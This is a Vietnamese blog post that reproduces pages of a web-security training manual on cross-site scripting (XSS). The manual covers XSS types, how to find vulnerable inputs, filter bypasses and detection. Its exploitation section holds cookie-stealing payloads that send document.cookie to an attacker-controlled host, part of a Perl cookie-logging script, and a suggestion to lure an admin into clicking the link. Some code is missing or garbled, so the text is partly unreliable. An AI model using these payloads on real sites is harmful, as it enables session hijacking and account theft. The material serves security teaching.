CHỈNH SỬA VĂN BẢN - CHUYỂN ĐỔI FONT CHỮ - LÊN MỤC LỤC - DOWLOAD TÀI LIỆU TRÊN CÁC WEBSITE NHƯ: 123doc, xemtailieu, tailieu.vn ... HOÀN TOÀN MIỄN PHÍ. TẬN TÂM ĐEM LẠI LỢI ÍCH LỚN NHẤT CHO KHÁCH HÀNG
Monday, April 18, 2016
các lỗ hổng thường gặp trong quản lý website
2 BIS ĐINH TIÊN HOÀNG,DAKAO, QUẬN 1, TPHCM
TEL : 38244041– 090 78 79 477 WEBSITE : WWW.ATHENA.EDU.VN
Client-Site Script như JavaScript, JScript, DHTML và cũng có thể là cả
các thẻ HTML.
Các phương thức XSS:
- non-persistent XSS (Reflected XSS)
-persistent XSS (Stored XSS)
-Dom-Based XSS
A. XSS hoạt động như thế n ào?
Về cơ bản XSS cũng như SQL Injection hay Source Injection, nó
cũng là các yêu cầu (request) được gửi từ các máy client tới server nhằm
chèn vào đó các thông tin vượt quá tầm kiểm soát của server. Nó có thể là
một request được gửi từ các form dữ liệu hoặc cũng có thể đó chỉ là các
URL như là
Code:
http://www.example.com/search.cgi?query=alert(''XSS was
found !'');
Và rất có thể trình duyệt của bạn sẽ hiện lên một thông báo "XSS
was found !".
Các đoạn mã trong thẻ không hề bị giới hạn bởi chúng
hoàn toàn có thể thay thế bằng một file nguồn trên một server khác thông
qua thuộc tính src của thẻ . Cũng chính vì lẽ đó mà chúng ta chưa
thể lường hết được độ nguy hiểm của các lỗi XSS.
Nhưng nếu như các kĩ thuật tấn công khác có thể làm thay đổi
Tài liệu nghiên cứu an ninh web – lưu hành nội bộ
13
2 BIS ĐINH TIÊN HOÀNG,DAKAO, QUẬN 1, TPHCM
TEL : 38244041– 090 78 79 477 WEBSITE : WWW.ATHENA.EDU.VN
được dữ liệu nguồn của web server (mã nguồn, cấu trúc, cơ sở dữ liệu) thì
XSS chỉ gây tổn hại đối với website ở phía client mà nạn nhân trực tiếp là
những người khách duyệt site đó. Tất nhiên đôi khi các hacker cũng sử
dụng kĩ thuật này đề deface các website nhưng đó vẫn chỉ tấn công vào bề
mặt của website. Thật vậy, XSS là những Client-Side Script, những đoạn
mã này sẽ chỉ chạy bởi trình duyệt phía client do đó XSS không làm ảnh
hưởng đến hệ thống website nằm trên server.
Mục tiêu tấn công của XSS không ai khác chính là những người sử
dụng khác của website, khi họ vô tình vào các trang có chứa các đoạn mã
nguy hiểm do các hacker để lại họ có thể bị chuyển tới các website kh ác,
đặt lại homepage, hay nặng hơn là mất mật khẩu, mất cookie thậm chí
máy tính bạn có thể sẽ bị cài các loại virus, backdoor, worm ..
B. Khai thác với XSS
Nhận biết website bị dính lỗi XSS :
Thường thì XSS có thể xảy ra ở chỗ nào mà người dùng có thể
nhập dữ liệu vào và sau đó sẽ nhận được 1 cái gì đó .Nên thường chúng ta
sẽ kiểm tra ở những login form đầu vào .Khi nhập 1 chuỗi kí tự nào đó mà
kết quả của server trả về có dính tới chuỗi mà bạn nhập thì rất có khả
năng site bị dính XSS .
Tài liệu nghiên cứu an ninh web – lưu hành nội bộ
14
2 BIS ĐINH TIÊN HOÀNG,DAKAO, QUẬN 1, TPHCM
TEL : 38244041– 090 78 79 477 WEBSITE : WWW.ATHENA.EDU.VN
Giả sử đoạn code chèn XSS là : < script>alert(„XSS‟)< /script> vào login
form và sau đó nhận đc Popup có chữ XSS thì chắc chắn site đó bị dính
XSS
Note : 1 số trường hợp bị dính lỗi XSS nhưng ko xuất hiện XSS ---à lúc
này phải View source , nếu thấy có < script>alert(„XSS‟)< /script> thì
khai thác.
Một cách khác là chèn script vào các biến truyền trực tiếp trên address.
Vd : http://sitebixss.com/index.php?act=[chèn xss vào đây]
Giả sử đoạn code chèn XSS là : < script>alert(„XSS‟)< /script> và cũng
nhận đc popup XSS thì site đó cũng bị dính .
Khai thác :
Thông thường các attacker sử dụng XSS để lấy các thông tin quan trọng :
cookie , user name +pass . Ở đây sử dụng XSS để đánh cắp cookie của
victim :
Cách chèn script : sử dụng Java script .
Code :
Tài liệu nghiên cứu an ninh web – lưu hành nội bộ
15
2 BIS ĐINH TIÊN HOÀNG,DAKAO, QUẬN 1, TPHCM
TEL : 38244041– 090 78 79 477 WEBSITE : WWW.ATHENA.EDU.VN
javascript:alert(document.cookie)
+Dùng file .php:
CODE
javascript:location="http://hostcuaban/cookie.php?cookie="+(docum
ent.cookie)
Hàm location để chuyển trình duyệt đến 1 trang khác, lúc đó
document.cookie sẽ thay bằng giá trị cookie.
Cách exploit:
Đầu tiên tạo file cookie.php thế này up lên host của bạn ( host cần hỗ trợ
php)
Tài liệu nghiên cứu an ninh web – lưu hành nội bộ
16
2 BIS ĐINH TIÊN HOÀNG,DAKAO, QUẬN 1, TPHCM
TEL : 38244041– 090 78 79 477 WEBSITE : WWW.ATHENA.EDU.VN
XSS giúp steal được cookie của victim, khai thác trên trình duyệt như sau:
CODE
http://sitexss.com/index.php?act=location="http://hostcuaba
n.com/cookie.php?cookie="+(document.cookie)
Cookie victim sẽ lưu lại ở file xss.txt trên host của bạn
Bây giờ chỉ còn việc dụ "Alert" admin vào link, đổi
DIACHIDEDUDO.DUDO lai thành site muốn nó vào sau khi cookie đã
lưu lại.
+Dùng file .asp
Tạo 1 file cookie.asp có nội dung như thế này :
Sau đó up lên host hỗ trợ asp , và cũng làm tương tự như trên .
CODE :
window.open("http://www.hostbanupfile.com/cookie.asp?coo
kie="+document.cookie)
+Dùng file .cgi :
#! /usr/bin/perl
#steal.cgi by David Endler
#Specific to your system
$mailprog = ''/usr/sbin/sendmail'';
#creat log file
open (COOKIES,">>stolen_cookie_file");
#what victim see
print " Content-type: text /html \n\n";
Tài liệu nghiên cứu an ninh web – lưu hành nội bộ
17
2 BIS ĐINH TIÊN HOÀNG,DAKAO, QUẬN 1, TPHCM
TEL : 38244041– 090 78 79 477 WEBSITE : WWW.ATHENA.EDU.VN
print code< /script> thì sẽ bị chặn như sau :
Vượt qua cái này bằng cách dùng thẻ đóng để đóng cái
kia . Nghĩa là ta chèn cái này vào :
< script>
< /script>
Không cho JAVASCRIPT tồn tại :
Trong trường hợp này thì hầu hết các ký tự đặt biệt được nhập vào từ
người dùng đều bị lọc , do đó để vượt qua thì hacker phải mã hoá code
nhập vào :
http://sitebiloi.com/search.cgi?quer...alert%28%27XSS %27%29%7d%3b
Chuỗi "%26%7balert%28%27Mask%27%29%7d%3b" chính là
{alert(''XSS'')}; đã được mã hoá
C. Phát hiện XSS bằng cách nào ?
Nếu như các bạn sử dụng các mã nguồn của các chương trình có sẵn
bạn có thể tham khảo danh sách các lỗ hổng của chương trình bạn trên các
trang web chứa các thông tin về bảo mật như securityfocus.com,
securiteam.com,... Tuy nhiên nếu các website được tự viết mã nguồn thì
bạn không thể áp dụng phương pháp trên. Trong trường hợp này bạn cần
đến các chương trình scanner tự động. Nếu như bạn sử dụng trong môi
Tài liệu nghiên cứu an ninh web – lưu hành nội bộ
19
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment